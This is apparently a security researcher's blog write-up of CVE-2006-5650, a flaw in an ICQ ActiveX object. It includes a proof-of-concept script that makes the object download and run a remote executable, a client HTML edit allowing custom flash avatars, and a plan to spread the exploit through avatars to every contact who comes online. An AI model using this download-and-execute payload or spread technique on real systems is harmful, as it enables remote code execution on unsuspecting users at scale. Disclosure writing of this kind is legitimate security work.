ICQ Exploit CVE-2006-5650

I’ll kick off with imho one of my more interresting findings. Its not interresting due to the nature of the vulnerability, but due to the possible impact. It was quite some time ago already, back in the summer of 2006 when I was looking into COM objects that came installed with ICQ. If you’re unfamiliair with COM objects and how that ‘sneak’ in with program installations, I suggest you read this article. Anyway, installing ICQ added a few COM objects that were accesible as ActiveX Objects in IE6 without warning. Most of them were a bit boring, but there was a nice design error in one of them.

The object in question had CLSID: 54BDE6EC-F42F-4500-AC46-905177444300 and ws also accesible under the name ‘ICQPhone.SipxPhoneManager’

It exposed a function called ‘DownloadAgent’ wich had one parameter. The string you entered as parameter would be used as a URL and the location of the URL would be downloaded to the local machine and then run.
So if you pointed it to a .html file it would download it and run it from some local ICQ directory. Pointing it to a .exe file was ofcourse much more interresting :)

<script>
var icqphone = new ActiveXObject(‘ICQPhone.SipxPhoneManager.1′);
icqphone.DownloadAgent(‘http://192.168.1.100/putty.exe’);

</script>

Would download putty.exe (yes the real deal, and a safe test file :)) from my local network and start it.

Sofar so good, but a bit boring. ActiveX exploits were all to common back then (and even now). The impact of this exploit would be limited to the amount of ICQ user that would surf with IE6 and would visit your evil website.

So I decided to dive a bit deeper into ICQ and see if I could find a way to (ab)use the ICQ Network to spread the joy automatically. After all, “shared joy is double joy

After some searching I quickly noticed that ICQ used flash for those annoying moving avatars. I remembered from a quick flash course that its quite easy to open a website from a flash file, so all I needed was my own flash as Avatar.

I decided to take the easy way and rather then dive into the ICQ protocol I would stay on the client side and check if there was anything that would prevent me from loading my own flash avatar. There wasnt anything there so now all we needed was an easy way to trick ICQ into loading our own custom flash avatars.

The easiest way I found was to alter a small part of the ICQ client. The client was a mixture of flash, html, javascript and some other stuff. All we needed was a small change in a single HTML file that would allow us to use our own flashfile as avatar.

C:\Program Files\ICQLite\Plugins\Feature\all\Avatar\avatars_galerry5.html

function updateData ( doCloseWin )
 {
  if ( !top.icqConnector.GetIMOwnerData(“IS_ONLINE”) ) {
   alert(top.getTxt(“ownerIsOffLine”));
   return;
  }
        if (!gl_applied)
        {
        ………

would be changed into

function updateData ( doCloseWin )
 {
  if ( !top.icqConnector.GetIMOwnerData(“IS_ONLINE”) ) {
   alert(top.getTxt(“ownerIsOffLine”));
   return;
  }
        msgImg.src = prompt(msgImg.src, msgImg.src);
        if (!gl_applied)
        {
        ………

This function was used to return the URL of the custom avatar (normally located on some ICQ website). If you now changed your own avatar,  went to the ‘animated avatar’ section and picked a new animated avatar, you would be presented with a question dialog that would allow you to overrule the URL of the animated devil with oyr own URL. This URL would then be used as your flash avatar URL.

Abusing this would be as easy as: going offline, changing your avatar into a flash file that would load a evail HTML with the ICQPhone ActiveX exploit on it, and then going online again. Every one with you on their contact list would then see a small tray window that said something about ‘nick has come online’ with your new, evil, avatar next to it. The result would be annoying for everyone, and pretty annoying for people using IE6. Everyone would be presented with a browser popping up, but the IE6 users would also be compromised by the ICQ exploit. This ofcourse only worked if someone had the default ICQ settings allowing the ‘nick has come online’ popups. But even if they haddent, they would most likely open a chat window with a message from someone in their contactlist and thus be scr*wed anyway.

This was back in 2006, and I havent checked recently, but the last time I did check (somewhere in 2008) it was still possible to abuse the ICQ Avatar in this way. So basically all browser based exploits can be delivered using this nasty trick.

For this particullair exploit I estimated that it would be possible to hit approx 10 – 15 million ICQ users quite quickly. Based on the theory ‘Six degrees of separation’ it would be quite easy to reach most people on ICQ pretty quick. Not all of them would have internet explorer as their default browser, but in 2006 75% – 80% of all users had IE as default browser.

Relevant links:

Leave a comment

Your comment

Spam protection by WP Captcha-Free